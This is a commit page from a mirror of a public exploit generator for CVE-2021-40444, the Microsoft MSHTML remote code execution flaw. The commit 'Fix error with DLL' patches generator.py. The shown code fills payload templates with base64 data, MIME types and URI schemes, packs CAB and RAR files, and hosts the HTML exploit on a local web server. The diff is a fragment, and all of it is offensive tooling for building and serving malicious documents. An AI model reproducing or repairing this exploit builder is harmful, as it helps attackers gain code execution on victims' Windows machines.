r3pek/CVE-2021-40444
1
0
Fork 0
mirror of https://github.com/klezVirus/CVE-2021-40444.git synced 2024-11-23 22:10:48 +00:00
Code Releases Activity

Fix error with DLL

Browse source
This commit is contained in:
d3adc0de 2022-06-22 21:21:35 +01:00
parent d1c242ed02
commit d57ebb7901
1 changed files with 6 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
generator.py
View file

@ -68,10 +68,12 @@ def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path):
.Set MaxCabinetSize=0 .Set MaxCabinetSize=0
.Set MaxDiskFileCount=0 .Set MaxDiskFileCount=0
.Set MaxDiskSize=0 .Set MaxDiskSize=0
{inf_file.absolute()}""") "{inf_file.absolute()}"
""")
def execute_cmd(cmd, execute_from=None): def execute_cmd(cmd, execute_from=None):
print(cmd)
try: try:
subprocess.check_output( subprocess.check_output(
cmd, cmd,
@ -326,7 +328,7 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False,
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}") content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit)) content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
content = content.replace('<BASE64_DATA_HERE>', b64_payload) content = content.replace('<BASE64_DATA_HERE>', b64_payload)
content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) if exploit != ".dll" else ""
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit)) content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1]) content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2]) content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
@ -436,6 +438,7 @@ if __name__ == '__main__':
port = 80 port = 80
ip = "127.0.0.1" ip = "127.0.0.1"
scheme = ""
try: try:
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0] scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0]
if scheme == "http": if scheme == "http":
@ -462,7 +465,7 @@ if __name__ == '__main__':
traceback.print_exc() traceback.print_exc()
exit(1) exit(1)
if args.host and html: if args.host and html:
print(f'[*] Hosting HTML Exploit at {ip}:{port}/{html}...') print(f'[*] Hosting HTML Exploit at {scheme}://{ip}:{port}/{html}...')
start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv")) start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv"))
if args.test: if args.test:
if os.path.splitext(args.payload)[1] != ".wsf": if os.path.splitext(args.payload)[1] != ".wsf":